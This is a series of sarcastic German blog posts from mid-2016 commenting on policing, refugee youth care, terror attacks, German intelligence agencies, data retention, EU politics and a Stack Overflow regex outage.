Der hat nämlich festgestellt, dass er in Budgetkrisenzeiten die Berechtigung hat, einen Anwalt schlicht zu verpflichten, eine Pflichtverteidigung zu übernehmen. Davon hat er bisher nicht Gebrauch gemacht, weil er fand, dass die Anwälte aus der Privatwirtschaft ja nichts dafür können, dass der doofe Gouverneur ihm sein Budget immer zusammenstreicht. Aber dann fiel ihm auf, dass der Gouverneur selber ein Anwalt ist — und er zieht ihn als Pflichtverteidiger ein! :-) (Danke, Andreas)

Tue Aug 2 2016

[l] Geschichten aus dem Polizeialltag: Party von frisch ausgebildeten Polizisten, es kommt unter Alkoholeinfluss zu einer Prügelei. Die Security von dem Etablissement schreitet ein, begleitet die Prügelcops gegen ihren Willen nach draußen. Es gibt ein Video davon, dass das Fehlverhalten der Cops vor, während und nach des Rausschmisses zeigen.
Wer kriegt einen Prozess wegen Körperverletzung an den Hals?
Ihr werdet es schon richtig geraten haben.
Der Türsteher.
Was Romstorfer auffällt: Die Beamten, alle in ihren Zwanzigern, haben dennoch dezidiert nach einem Rettungstransport ins Spital verlangt. "Da musste sogar extra ein zweiter Wagen kommen", hält Romstorfer den Zeugen vor. "Und Ihre eigenen Kollegen, die das aufgenommen haben, haben sogar einen Aktenvermerk gemacht, dass Sie problemlos selbst hinfahren hätten können." Die Antworten sind ausweichend.
Ja, so macht man das bei der Polizei! Das scheint Teil der Ausbildung zu sein.

Tue Jul 26 2016

[l] Habt ihr euch bei dem Putsch in der Türkei auch solche Sorgen gemacht?
Nein, nicht um die Türken.
Um die CSU! In ihrem eigenen Law&Order-Stadium geschlagen! Von einem Amateur! Einem türkischen Amateur, auch noch! Einem Ausländer!!
Aber sorgt euch nicht, denn Horst Seedogan ist am Ball.
Geht es nach der CSU, muss die Antwort auf die Ereignisse der vergangenen Tage heißen: mehr Polizei, mehr Kontrollen und ein strengerer Umgang mit Flüchtlingen und Asylbewerbern.
Jawollja!
[l] Es ist mal wieder Zeit für ein paar Leser-Zuschriften.
1. Man liest seit dem Attentat, es gäbe für die UMFs [unbegleitete jugendliche Flüchtlinge] die Möglichkeit, eine Traumatherapie zu machen, z.B. hier. Stimmt so aber nicht. Tatsächlich bekommt man für jugendliche Flüchtlinge nichtmal Plätze in der Psychiatrie, wenn man von jenen absieht, die einen so schlechten Ruf haben, dass sie einfach keine einheimische Kundschaft mehr bekommen. Selbiges gilt für Psychologen - der einzige mir bekannte in [Gegend zensiert], der UMFs behandelt, stopft die dann einfach mit Psychopharmaka zu, und die Behandlung ist fertig.
2. Wo wir gerade bei Ärzten sind: Viele weigern sich, UMFs zu behandeln, oder stellen nicht erfüllbare Forderungen. Z.b. das ein Dolmetscher zur Behandlung mitkommt.
3. Wo wir gerade bei Dolmetschern sind: Die paar Male, als ich welche bekommen habe, wenn ich sie brauchte (kostet ja Geld), kann ich an einer Hand abzählen.
4. Und Geld wird gerne gespart. Im oben verlinkten Artikel steht, der Vormund hätte die Aufgabe den Familiennachzug zu beantragen. Klingt toll? In beiden Landkreisen werden die Anträge von Minderjährigen systematisch verschleppt. Und solange der Antrag nicht bearbeitet wurde, kann kein Familiennachzug beantragt werden. Auf wundersame Weise kommt das Ausländeramt immer erst dann dazu, wenn der Jugendliche 18 Jahre alt wird, und damit den Anspruch auf den Familiennachzug verliert. Mit diesem Nachzug bringen übrigens die Schleuser die Familien dazu, ihre minderjährigen Söhne auf die Reise zu schicken.
5. Eine ähnlich nette Praxis gibt es bei der Hilfe für junge Volljährige. Laut Gesetz müssen die noch weiter betreut werden, wenn sie (noch) Hilfe brauchen. Da Vater Staat aber gerne spart, werden die ohne weitere Überpüfung in die GU/DU [GU = Gemeinschaftsunterkunft, DU weiß ich auch nicht] gesteckt. Wenn sie Glück haben, gibt es jemanden, der sich um sie kümmert. Wenn sie Pech haben nicht. Das wird hier so praktiziert, selbst wenn ein Blinder sieht, das die Person, um die es geht (weshalb auch immer), alleine nicht über die Runden kommen wird. Die einzigen Ausnahmen sind attestierte Behinderungen.
6. Die UMF-Unterkünfte. Die Mitarbeiter sind größtenteils nicht für den Umgang mit Traumatisierten ausgebildet. Sie sind größtenteils nicht für Migrationsarbeit ausgebildet. Sie sind größtenteils nicht für die Arbeit mit Jugendlichen ausgebildet. Die Mitarbeiter in den Unterkünften sind häufig anstrengender als die Jugendlichen. Fast keiner unter den Mitarbeitern spricht Englisch. Die Träger versuchen zu sparen, so gut es halt geht, und holen meiner Einschätzung nach teilweise auch sehr gut Geld aus der Geschichte. Dementsprechend stellen die viel zu wenige, viel zu gering Qualifizierte ein, die dann teilweise 60, 70 Stunden pro Woche (und schlimmstenfalls mehr) arbeiten. Die Heimaufsicht ist dabei sehr großzügig, weil es ja zu wenig Plätze gibt (weil ja niemand damit rechnen konnte das hier mal Leute herwollen!). Die haben in [Gegend zensiert] zwei Stellen besetzt, die sich mit den UMF-Gruppen beschäftigen, und für den Bezirk [Gegend zensiert] zuständig sind. Nur die richtig miesen Läden (z.B. [Name zensiert], ein "sozialer" Sperrmüllhändler bzw. ein "soziales Zeitarbeitsunternehmen" der seine angeschlagenen Finanzen mit seinem Ausflug in den Bereich aufbessern wollte) wurden dabei ernsthaft kontrolliert und dichtgemacht. Den Standards gerecht wird aber keiner.
7. Die Beschulung ist auch scheiße. Viel zu große Gruppen, teilweise nicht ausreichend ausgebildete Lehrer. Und nicht annähernd genügend Schulplätze. In der Umgebung warten ca. 200 minderjährige auf einen Schulplatz.
8. Jetzt noch etwas positives zum Schluss: Die Flüchtlinge mit denen ich arbeite, ob jung oder alt, sind sehr viel höflicher und motivierter als die Deutschen, die einen ähnlichen Bildungszugang haben. Eigentlich sind die alle sehr offen und freundlich, sieht man von extremen Ausnahmefällen ab (die dann aber auch eine entsprechende Biographie haben). Im Alltag sind sie auch viel weniger chauvinistisch (sei es gegenüber anderen Religionen, dem anderen Geschlecht, oder anderen Sexualitäten) als die Vergleichsgruppe. Probleme mit Gewalt gibt es ab und zu, aber das sind dann harmlose Raufereien unter Jugendlichen. Aber auch hier ist es bei den Flüchtlingen in der Qualität gefühlt harmloser.
Ich und alle anderen in dem Bereich sind guten Mutes, das die Integration der Jugendlichen klappt. Wenn die beschriebenen Probleme beseitigt würden, täten wir uns daran allerdings deutlich leichter.
Update: Ein anderer Leser dazu:
Diese Art der Verschleppung von Anträgen und die unberechtigte Einstellung von Hilfsleistungen bei Volljährigkeit gibt es nicht nur bei Flüchtlingen. Wir haben als Pflegefamilie so ziemlich genau dieselben Dinge erlebt, die Jugendämter verfahren mit unbequemen oder teuren Anträgen gerne genauso. Und wir reden hier über deutsche Pflegekinder aus deutschen Herkunftsfamilien. Wir haben regelmässig Anträge gegen persönliche Unterschrift des Sach^h^h^h^hSozialarbeiters direkt im Amt abgeliefert, und mussten des öfteren Leistungen, die den Kindern nach SGB VIII zustanden und die benötigt waren, unter Androhung von Klage bzw durch tatsächliche Klage einfordern. Hier wird sehr gerne nach dem Prinzip verfahren, das das Jugendamt zunächst versucht, Dinge auszusitzen, dann damit droht, die Kinder aus der Familie zu nehmen, da man ja offensichtlich überfordert sei, im Verfahren dann schnell wegen klarer Chancenlosigkeit einknickt und trotzdem noch um jeden Cent (buchstäblich) einer Leistung feilscht.
Es geht hier niemals um die Betroffenen, sondern darum, das den Buchstaben des Gesetzes Folge geleistet wird, und das mit möglichst wenig finanziellem Aufwand. Dabei sind die Gesetze im SGB VIII dazu da, Leistungen nach dem Bedarf des Hilfsbedürftigen zu regeln. Regelmässig wird auch von Richtern dementsprechend entschieden, das eine Leistung dem Bedarf entsprechend zu leisten ist, dennoch werden diese Urteile von Amtsseite immer wieder ignoriert.
Wir behandeln also in Deutschland alle Hilfesuchenden gleich beschissen.

Sun Jul 24 2016

[l] Ich weiß nicht, ob ihr das wusstet, aber die Autoindustrie hatte in den Anfangsjahren ein massives PR-Problem. Ihr Produkt tötete Menschen. Nicht nur Menschen an sich, Kinder! Und es war völlig klar, wessen Schuld das war. Die der Autoindustrie.
Die Autoindustrie hat daraufhin entschieden, dass die Straße ihnen gehören soll, nicht den Menschen. Wer auf der Straße ist, ist selber schuld. Nicht nur selber schuld, nein, das soll eine Ordnungswidrigkeit werden! Dafür wurde der Bullshit-Tatbestand des "Jaywalking" erfunden. Hier hat das mal jemand erklärt.
Ich hatte das schonmal verlinkt vor ein paar Jahren. Jetzt verlinke ich es nochmal, weil ich diesen Artikel fand, der im Kontext mit der Autoindustrie gleich noch mal doppelt so schlagkräftig ist.
Die These ist, dass die Banken gerade machen, was die Automobilindustrie damals gemacht hat. Die Schuld (und Haftung!) von "Unterschrift unter Scheck gefälscht" über die Erfindung eines Bullshit-Tatbestandes names "Identity Theft" auf den Kunden abschieben.

Thu Jul 21 2016

[l] Der Leserservice der Legal Tribune Online erklärt, welche Auswirkungen das neue Sexualstrafrecht auf euer Verhalten haben sollte. Zumindest wenn ihr nicht in den Knast wollt.
Gute Arbeit, liebe Feministen! Das habt ihr ja echt mit voller Wucht und mit Ansage gegen die Wand gefahren. Um zu zeigen, dass ihr es könnt.
Wenn wir das als Gesellschaft haben wollen, wieso haben wir dann nicht einfach den katholischen Gottesstaat ausgerufen?
Den Vergleich bringe ich deshalb, weil das bei mir einen klaren Fall von Confirmation Bias ausgelöst hat, seit ich dem Konzept des Virtue Signalling begegnet bin. Plötzlich sehe ich das überall, und vor allem sehe ich es als wichtigen Grund für den Untergang von Gruppierungen und ganzen Zivilisationen. Die katholische Kirche ist ein so ein Fall. Deren Dogmengerüst fing gut an, mit der Bergpredigt und so weiter, und dann entwickelt sich aus den normalen Fluktuationen in einem sozialen Gefüge ein Spike in irgendeine Richtung heraus, und Virtue Signalling sorgt dann dafür, dass alle in die Richtung weiterrennen.
Und jetzt stellt euch mal vor, ihr seid in der katholischen Kirche ein Reformator und wollt Dinge ändern. Dafür braucht ihr eine kritische Masse von Anhängern, und um die zu kriegen, müsst ihr die auf eure Seite ziehen. Und da kriegt ihr sie hin, indem ihr die Werte der Gruppe besonders stark vertretet. Und so gibt es ein Virtue Signalling-Rennen. Und am Ende wacht man auf und hat Donald Trump als Präsidentschaftskandidaten.
Ob das mit den Osterinseln auch so lief? Ja klar haben wir hier ein existenzielles Problem, aber ich bau erstmal noch ein paar Steinköpfe, um die anderen auf meine Seite zu ziehen?
Der Klimawandel ist ja auch so ein Ding. Da geht das Virtue Signalling in die Richtung "ich tu nix, was der Wirtschaft schadet".
Auf dem Weg von so einem kollektiven Amoklauf gibt es dann immer wieder Punkte, an denen man merkt, dass das gerade über das Ziel hinausgeschossen ist. Und da ist dann die Frage, ob man sich zur Klärung dieses Sachverhalts lang genug aus der Echokammer bewegen kann. Der Vorteil von Virtue Signalling ist, dass man damit Gleichgesinnte finden kann. Der Nachteil ist, dass die dann nicht die gepredigten Werte kritisch hinterfragen werden.
Manchmal kann man die Richtung beim Virtue Signalling noch ein bisschen ändern, indem man irgendwas zum Supergrundrecht ernennt. Die Republikaner hatten immer das Mantra "kleiner Staat". Der Staat soll sich nicht einmischen. Dieser Schusswaffenkram war in der Interpretation nur ein Auswuchs des kleinen Staats. Der soll sich nirgendwo unnötig einmischen, das schließt auch die Schusswaffen ein. Aber guckt mal jetzt gerade, bei Trumps Wahlkampf, da ist nirgendwo ein Wort vom kleinen Staat. Jetzt sind es die Terroristen und Ausländer. Und inhaltsfreies Gesülze wie "make America great again".
Ich glaube, dass das bei den Feministen auch grob so läuft. Da gewinnt im Moment eine Strömung, deren Virtue Signalling sich um Rape Culture dreht. Je mehr und absurder man überall sexuelle Übergriffe sieht, desto höheres Standing hat man in dieser Gruppe. Da ist dann auch nicht mehr die Frage, ob das, was man gerade tut, sinnvoll ist und hilft, sondern es geht nur noch darum, etwas gemacht zu haben. Um zu signalisieren, dass man die richtigen Werte vertritt.
Und wo die Republikaner Donald Trump haben, haben wir Heiko Maas. Der ist ja durchaus sensibel, muss man ja sagen. Der tanzt gleich auf mehreren Virtue Signalling-Hochzeiten (u.a. auch auf der Internetzensur-"Hassbotschaften! Überall!!1!"-Schiene). Ein lupenreiner Opportunist, der Mann. Das Destillat der "Werte" der SPD.
Was meint ihr? Wie krass übers Ziel trägt mich da der Confirmation Bias?
[l] Stackoverflow war down, weil jemand eine Zeile mit zu vielen Leerzeichen gepostet hat. Stellt sich raus, dass sie darauf eine Regex anwenden, um Leerzeichen am Ende zu löschen. Und weil ihre Regex-Engine (wie die meisten Regex-Engines übrigens!) mit Backtracking arbeitet (die Engine in der dietlibc macht sogar Backtracking und Rekursion), ist das Matchen von 20000 Leerzeichen echt ineffizient.
Ich habe ja erst das Drachenbuch gelesen, bevor ich meine erste Regex-Engine geschrieben oder auch nur jemand anderes Engine gelesen habe, und war echt erstaunt, wieso die da Backtracking statt endlichen Automaten machen, wie das im Drachenbuch so schön erklärt wird.
Stellt sich raus, dass Regex-Engines mehr machen als nur zu matchen. Die geben einem auch die Position des Matches — und der Gruppen in der Regex. Man ruft regexec auf (für POSIX-Regex), und die kriegt als 3. und 4. Argument ein Array, in das sie diese Positionen reinschreiben soll. Wenn man aber tatsächlich über finite Automaten wie im Drachenbuch beschrieben matcht, liegt diese Information nicht vor.
Und daher basieren die meisten üblichen Regex-Engines auf Backtracking.
Man kann das trotzdem mit finiten Automaten machen, aber das verlangt dann eben richtig Hirnschmalz und ist eine ernstzunehmende Programmieraufgabe. Google hat z.B. eine Regex-Engine auf endlichen Automaten gemacht, die man benutzen kann.
Das Regex-Problem ist übrigens altbekannt und halbwegs wohldokumentiert.
Falls das hier wie Häme über Stackoverflow wirkt: Ist es nicht. Im Gegenteil. Hut ab, dass sie das so freimütig ausplaudern. Andere Leute hätten einen DDOS herbeigelogen, um ihr Gesicht zu wahren. Übrigens war deren Bug gar nicht das ultra-katastrophale Backtracking-Problem (wenn man User die Regex angeben lässt, geht es noch deutlich schlimmer), sondern einfach eine ineffiziente Engine. Aber weil das Backtracking-Problem immer noch vergleichsweise wenig bekannt ist, dachte ich mir, ich schreib da mal was drüber.

Tue Jul 19 2016

[l] Ein junger Mann mit Axt und Messer ist in einem Zug bei Würzburg Amok gelaufen. Er war noch nicht volljährig und anscheinend ein Flüchtling aus Afghanistan, seine Opfer kamen aus Hong Kong. Die aktuelle Theorie ist das gute alte "verwirrter Einzeltäter".
Ich weiß ja nicht, wo der genau herkam, aber wenn ich mir da jetzt was ausmalen müsste, würde ich mir ungefähr so eine Geschichte zusammenklauben: Familie schickt ihren vom Nato-Drohnenmordkrieg traumatisierten Jungen als Vorhut nach Deutschland, damit er sie nachholen kann. Junge kommt an, hat PTSD, wird hier ins Flüchtlingsheim mit den ganzen anderen traumatisierten Flüchtlingen gepfercht, sieht für sich überhaupt keine Chance, genug Kohle zusammen zu tragen, um seine Familie nachzuholen, und will dann die Schuldigen an seiner Misere zur Rechenschaft ziehen. An die kommt er aber nicht ran, also nimmt er halt jemanden, an der er rankommt.
Ich würde das nicht auf die Religion schieben, selbst wenn der im Zug angeblich eine selbstgemalte ISIS-Fahne geschwenkt und "Allah ist groß" gebrüllt hat. Die Menschen sprechen halt mit dem Vokabular, das sie haben. Was habt ihr denn gedacht, womit ein Flüchtling aus Afghanistan wedeln würde? Mit dem Kommunistischen Manifest?
Wenn man bedenkt, was die Menschen in Afghanistan so für Erlebnisse mit westlichen Bomben, Soldaten und Drohnen gemacht haben, ist es eigentlich ziemlich erstaunlich, dass da nur so wenige von amoklaufen.
Update: Die ISIS-Fahne hat er nicht mal geschwenkt sondern die wurde bei ihm zuhause gefunden.

Sat Jul 16 2016

[l] Habt ihr das Buch "Daemon" gelesen? Von Daniel Suarez?
Da geht es unter anderem um eine Art kybernetische Utopie. Computer blicken mehr als Menschen, was gerade getan werden muss, und schicken Menschen daher Botschaften auf ihre Mobiltelefone, was sie tun sollen. Jede Handlung ist minimal, so dass die Menschen gar nicht mehr verstehen, woran sie gerade mitarbeiten.
In dem Buch geht es noch um ganz andere Sachen. Diese Idee, dass man einen zentralen Steuercomputer hat, am besten eine AI, die den Menschen sagt, was sie tun sollen, und alles wird gut, die ist schon älter. Googelt mal Kybernetik und Chile, da gab es mal einen Feldversuch. Als die Goldgräberstimmung bei Computern so richtig loslegte, haben viele Menschen gedacht, man könnte den Kommunismus, die Planwirtschaft, mit Computerhilfe real umsetzen.
Der Witz bei Daemon ist jetzt, wie sich der Autor denkt, dass man die Menschen dazu kriegen kann, dass sie den Anweisungen eines Computers folgen. Seine Lösung: Gamification. Da gibt es schlicht "Internet-Punkte" für, für die man sich dann im Online-Store Dinge kaufen kann. Am Ende so eine Art Barter-Ökonomie.
Der Punkt, wieso ich das gerade schreibe, ist weil wir gerade einen weiteren Feldversuch in Gamification haben, der mich enorm daran erinnert, wie ich mir Daemon beim Lesen so ausgemalt habe. Pokemon Go. In dieser Szene hat das Spiel in der Mitte des Central Park in New York irgendein seltenes (?) Pokemon gespawnt, und plötzlich setzt sich ein veritabler Maelstrom in Bewegung und ein Menschenstrom sammelt sich im Central Park. Nachts, wohlgemerkt. Auf mich wirkt das ungefähr so, wie ich mir das vorstelle, wie so eine Ameisenlinie auf mitlaufende Ameisen wirkt. Klar laufe ich da jetzt hin. Da laufen ja auch alle anderen hin.
Das Zeitalter, in dem per Gamification Menschen gesteuert werden, für Internet-Punkte Handlungen durchzuführen, ist offiziell eröffnet.
[l] Hier kamen mehrere Mails zu der "Vergleichswert"-Meldung vorhin rein. Was ich damit sagen wollte.
Hier ist, was ich zurückgeschrieben habe:
Ich stelle mir das aus Sicht eines Afrikaners vor, dessen Familie unter den 800 Toten auf dem Boot waren (das ist schon 2015 gesunken und schon damals haben sie da echt viele Tote geborgen).
Die nehmen ja nicht die Schrottboote und Schlepperbanden, weil sie Bock auf Absaufen haben, sondern weil wir in der EU die anderen Routen zugemacht haben.
Aus Sicht eines Afrikaners würde ich also die Schuld an dem Tod ganz klar bei der EU sehen.
Anders herum haben wir jetzt einen Afrikaner (Tunesier), der in Nizza 80 Menschen umbringt. Und alle fragen sich, warum jemand sowas tun würde.
Ich fand, dass dieses Boot einen möglichen Hinweis geben kann, wieso jemand sowas tun würde.
Zwei schlaue Fragen kamen daraufhin zurück, die ich hier auch gleich öffentlich beantworten möchte. Erstens, ob ich mir damit nicht anmaße, anderen meine Sichtweise aufzudrücken. Ja, das mache ich. Kann ich aber nicht verhindern, das findet unterbewusst immer statt. Wenn ich es nicht verhindern kann, lasse ich mir da auch wegen der moralischen Schuldfrage keine grauen Haare wachsen.
Zweitens, ob Religion und Fanatismus da für mich keine Rolle spielen. Doch, tun sie, aber in meinem Weltbild agieren Menschen erstmal rational, und Radikalisierung kann Menschen nicht zu Dingen zwingen, die sie nicht eh schon als Veranlagung in sich hatten, aber bisher erfolgreich unterdrückt haben. Aus meiner Sicht ist das eine Nebelkerze der Politik, immer auf die Religion hinzuweisen, weil sie dann nämlich nicht die unbequemen Wahrheiten bei sich selbst suchen müssen.
Was ich nicht zurückschrieb, aber hier mal als Illustration verwenden möchte: Wir hätten es auch Auschwitz-Wärtern nicht als Ausrede durchgehen lassen, dass sie halt radikalisiert wurden. Und wenn ein Massenmörder vor Gericht seine Religion als Ausrede bringen würde, würde das auch keine Strafminderung bewirken können. Die gleichen Maßstäbe sollten wir an Jihadisten anlegen. Jeder ist für seine Taten verantwortlich. Der Täter, nicht seine Religion. Die kann zwar auch Schuld haben, aber nicht zur Entlastung des Täters beitragen.

Fri Jul 15 2016

[l] Das Bundesverfassungsgericht pullt in Sachen Vorratsdatenspeicherung eine SPD und kippt endgültig um.
Darüber hinaus hat der Gesetzgeber den Abruf von Telekommunikations-Verkehrsdaten von qualifizierten Voraussetzungen abhängig gemacht, die das Gewicht der durch den Vollzug der Vorschrift drohenden Nachteile im Vergleich mit den Nachteilen für das öffentliche Interesse an einer effektiven Strafverfolgung weniger gewichtig erscheinen lassen.
Ja komm, so schlimm ist das doch nicht, wir haben doch hier die schriftlichen Versprechen der Junta, dass sie schon keinen Scheiß machen werden!1!!
Das ist unser Citizen United-Urteil. Davon erholt sich das Gericht nicht mehr.

Tue Jul 12 2016

[l] Die Europäische Telco-Branche bittet um großflächigen 5G-Boykott.
Gut, könnt ihr haben. Money Quote:
In der vergangenen Woche hatten Vertreter der Telekommunikationsbranche mit einem "5G Manifest" an die Kommission appelliert, 5G könne nur mit weniger Regulierung und weniger Netzneutralität gelingen.
So, wie ihr mich bei 3G und LTE abzuzocken versucht habt, habe ich eh keinen gesteigerten Bedarf an 5G. Ihr könnt gerne mal eine Runde an meinem ausgestreckten Arm verhungern.
Update: Verpasst nicht den Oettinger-Tweet, den Heise da rausgesucht hat. Heilige Scheiße. Nichts ist so hirnverbrannt, dass Oettinger nicht noch frohlockend aufspringt.
Update: Ein Einsender schreibt:
War im Urlaub in Russland (Sibirien), dort hatte ich mir bei MTS (kyrillisch MTC) geholt, 10 GB LTE und ab 01.00 Uhr konnte man ohne Limits laden. Ich hab diverse Speedtests gemacht und die waren identisch mit Deutsche Telekom 100 Mbit Tarif also ca. 80 Mbit Down + entsprechend Upload.
Preis im Monat, Prepaid: 4,50 – 5,00 Euro …

Mon Jul 11 2016

[l] Die Bundesregierung will als nächstes übrigens die Autobahnen an Heuschrecken, äh, "Investoren" verkaufen. Damit die … "investieren", wissenschon. Ich erinnere mich ja noch gut an die "Investoren", an die Berlin damals das Wasserwerk "verkauft" hat. Das Wasser war gut, die Qualität stimmte, der Preis auch. Danach wurde es teurer und schlechter und es kam raus, dass der Senat dem "Käufer" vertraglich Mindestprofitzusagen gemacht hatte, und der Steuerzahler dann noch draufzahlen musste, um die Versprechen einzuhalten.
Ungefähr so stelle ich mir das auch vor, wenn "Investoren" in unsere Autobahnen "investieren". Da wird genau gar nichts repariert werden, außer Menschenleben sind in Gefahr und eine direkte Haftung der Investoren steht so deutlich fest, dass man da auch nicht 20 Jahre rumklagen kann.
[l] Auch das noch: Der BND soll angeblich seinen Job gemacht haben.
Sorry, aber ich glaube ja kein Wort. Behörden, die Dinge gewuppt kriegen? Und dann ausgerechnet bei einer Behörde, die keinerlei Kontrolle unterliegt und Untätigkeit und Verkacken einfach als geheim erklären kann?!
Das glauben die hoffentlich selber nicht, dass ich ihnen das glaube.
[l] Die Nationalkonservativen haben in Japan inzwischen so viel Macht, dass sie die Verfassung ändern können. Und sie planen, es zu tun.
Abes LDP hat in einem 2012 vorgelegten Verfassungsentwurf deutlich gemacht, wohin es nach ihrer Vorstellung mit Japan gehen soll. Dabei geht es nicht nur um eine Änderung des Pazifismusartikels 9, der Japan Krieg als legitimes Mittel des Staates verbietet, sondern auch um eine weitreichende Einschränkung grundlegender Bürgerrechte.

Thu Jul 7 2016

[l] Der "Verfassungsschutz" hat sich im NSA-Ausschuss endgültig lächerlich gemacht. Nicht nur setzen sie jetzt Xkeyscore "im Wirkbetrieb" ein, d.h. eine Backdoor, äh, … Software eines feindlichen Nachrichtendienstes. Oh und der Maaßen ist ja der beste Präsident, den sie je hatten.
Generell sei Maaßen ein "außerordentlich erfolgreicher, sehr, sehr guter Präsident seiner Behörde".
Maaßen, der Staatsgeheimnisse an die Presse verrät, der das Parlament belogen hat, der unser Land mit seinem "die Terroristen tarnen sich als Flüchtlinge" international lächerlich gemacht hat, DER Maaßen. Der "ich gehe davon aus, dass die Amerikaner sich an amerikanisches Recht halten" Maaßen. Der, der keine Erkenntnisse finden konnte, dass GCHQ unser Internet abgehört hat. Ob er das mit Xkeyscore recherchiert hat? Der Maaßen, der als das Gesicht des NSU-Skandals in die Geschichtsbücher eingehen wird. Hans-Georg "virtuelle Trainingslager, Online-Handbücher und Kampfsimulatoren" Maaßen. Der, der schon im Fall "Murat Kurnaz" bewiesen hat, dass Menschenrechte und Verfassung nicht so wichtig sind, und dann zur Belohnung zum Chef der Behörde gemacht wurde, deren Namen uns ins Gesicht lügt, sie sei zum Schutz derselben Verfassung da, die Maaßen gerade mit Füßen getreten hat. Scheiß auf "ordentliches Verfahren", der Kurnaz bleibt mal schön in Guantanamo!
Oh. Bin ein bisschen abgeglitten. Das Bundesinnenministerium ließ jetzt in dieser Anhörung zu Protokoll geben:
Snowden sei aber schon zu seinen Zeiten bei der NSA und der CIA "von Anfang an eine nachrichtendienstlich gesteuerte Person" gewesen. Angesichts dessen "Verhalten nach der Zufluchtnahme in Moskau" spreche alles nachrichtendienstliche Erfahrungswissen dafür, dass er sich "komplett, in toto" habe "abschöpfen lassen". Alles, was für russische Dienste interessant gewesen sei, dürften diese inzwischen in Erfahrung gebracht haben.
Na WENN es jemanden gibt, dessen Erfahrungsschatz und Glaubwürdigkeit über jeden Zweifel erhaben sind, dann ist das ja wohl der "Verfassungsschutz"!1!!
Update: Hier die Pressemitteilung des Bundestages. Money Quote:
Der Einsatz einer Drohne, meinte Kaller, sei außerordentlich kostspielig und technisch aufwendig: "Ich kann mir einfach nicht vorstellen, dass die Amerikaner allein aufgrund der Ortung eines Handys eine Drohne abfeuern." Es gebe "keinen Nachweis eines unmittelbar kausalen Verlaufs eines gelieferten deutschen Datums für einen tödlichen Angriff".
Kannste dir gar nicht ausdenken. Wir haben ein fucking Video des fucking NSA-Chefs, wie er vor laufender Kamera herumprotzt, dass sie genau das tun.
Oh, und einen habe ich noch:
Verständnis äußerte Kaller auch für Maaßens Klage über anspruchsvolle parlamentarische Ermittlungen. Er und seine Mitarbeiter hätten derzeit ebenfalls Auskunftsbegehren von gleichzeitig vier Untersuchungsausschüssen zu unterschiedlichen Themen zu bedienen: "Ich kann Ihnen sagen, das ist eine enorme Belastung. Die Abteilung ächzt."
Als ob die ganzen Untersuchungsausschüsse halt Pech oder Zufall waren! Nein! Die waren Reaktionen auf Verkacken eurer Gammelbehörde!
Update: Der Maaßen hat noch einen echten Kracher abgesetzt (letzter Absatz):
Der Chef zählte vor Abgeordneten selbst die Ständige Vertreterin der Vizepräsidenten im BfV, Catrin Rieband, an. Die habe ihn nicht über den Fund der SIM-Karten informiert, obwohl man bei einer Wochenendtagung ständig miteinander gesprochen habe. Maaßen ging sogar noch weiter: Wenn es nach ihm ginge, dann sollte man im Hof des Bundesamts Kreuze aufstellen. Und ein paar Mitarbeiter drannageln.
Ja, liebe Leser aus dem Ausland. In Deutschland wird die Verfassung von einem Mann verteidigt, der selbst für seine eigenen Untergebenen Lynchjustiz fordert!

Mon Jul 4 2016

[l] Old and busted: Wirtschaft findet keinen guten Nachwuchs mehr.
New hotness: Der KGB findet keinen guten Nachwuchs mehr.
Die, die sie gefunden haben, haben erstmal ein Video mit dem Autokorso und mit Gruppenfoto von sich selbst gemacht und ins Internet gestellt. Einmal mit Profis arbeiten!
[l] Direkt nach dem Brexit gab es sofort bei den Hardcore-Anti-EU-Medien in UK Verschwörungstheorien, dass die EU jetzt schnell-schnell eine Europa-Regierung aus dem Boden stampfen wolle. Den Ländern die Souveränität wegnehmen, zentralistisches Unterdrückungsregime, die volle Breitseite.
Nun ist diese Idee, dass finstere Kräfte eine Weltregierung schaffen wollen, sozusagen ein Urgestein der Verschwörungstheorien-Branche. Normalerweise behaupten das bekloppte Schusswaffennarren und die Weltregierung wäre dann die Uno, nicht nur was für Europa.
Das sprach also schonmal direkt dagegen, dass da was dran sein könnte. Das und das Timing, natürlich.
Außerdem hat die EU ein Einstimmigkeitsprinzip, es müssten also alle Mitgliedsländer zustimmen. Das ist jedenfalls nach aktuellem Stand völlig ausgeschlossen. Dieser Plan wäre also nicht nur bescheuert und kontraproduktiv und würde den Brexit-Schreihälsen nachträglich ihr Gekreische legitimieren, er wäre auch nichts weiter als ein feuchter Traum irgendwelcher EU-Bürokraten, denn umsetzbar ist das nicht.
Ich habe also heiser gekichert und das als britischen Verschwörungsbullshit zu den Akten gelegt.
Stellt euch mein Erstaunen vor, als heute in der FAZ folgendes steht:
Der Präsident des Europäischen Parlaments Martin Schulz fordert als Konsequenz aus dem Brexit-Referendum den Umbau der Europäischen Kommission zu „einer echten europäischen Regierung“.
Wait, what?!
NEIN! Ich war mir sicher: So blöde sind die nicht in der EU. Die geben doch nicht nur eine Woche nach dem Brexit-Votum den Anti-EU-Deppen rückwirkend Recht und faseln was von weitergehendem Wegnehmen der Souveränität der Mitgliedsländer und Europa-Regierung?!
DOCH! Die SIND so blöde!
Aber Sekunde, mal nicht den Blutdruck unnötig steigen lassen. Was schlägt der Schulz denn konkret vor?
diese EU-Regierung solle „der parlamentarischen Kontrolle des Europaparlaments und einer zweiten Kammer, bestehend aus Vertretern der Mitgliedstaaten, unterworfen“ sein.
Ich weiß ja nicht, wie euch das geht, aber die Behauptung, dass irgendwas parlamentarischer Kontrolle unterworfen ist, das löst bei mir nur noch gelangweiltes Achselzucken aus. Wisst ihr, was noch parlamentarischer Kontrolle unterworfen ist? Die Geheimdienste! Und da konnten wir ja gerade prima sehen, wie toll sowas funktioniert!1!!
Wer übrigens dachte, mit "Umbau zu einer echten Regierung" ist gemeint, dass wir Demokratie einführen und die Kommission durch Wahlen von den EU-Bürgern selektiert werden, der irrt sich natürlich. Das soll genau wie jetzt ein groteskes Gruselkabinett aus intransparent Entsandten irgendwelcher bereits hinter zwei Indirektionen vom Wähler isolierten politischen Eliten bleiben.
Aber so kann man das natürlich nicht verkaufen, also packen sie da einen so krassen Spin dran, dass die Schwingungen in der EU Erdbebengefahr erzeugen:
Unzufriedenheit mit der EU führe dann nicht mehr dazu, schreibt Schulz in der F.A.Z., dass sie grundsätzlich in Frage gestellt werden. Vielmehr könnten die Bürger „durch Wahlen eine europäische Regierung durch eine andere ersetzen“.
Oh ach ja? Wie soll ich denn jemanden abwählen, den ich da hin hingewählt habe, Herr Schulz?
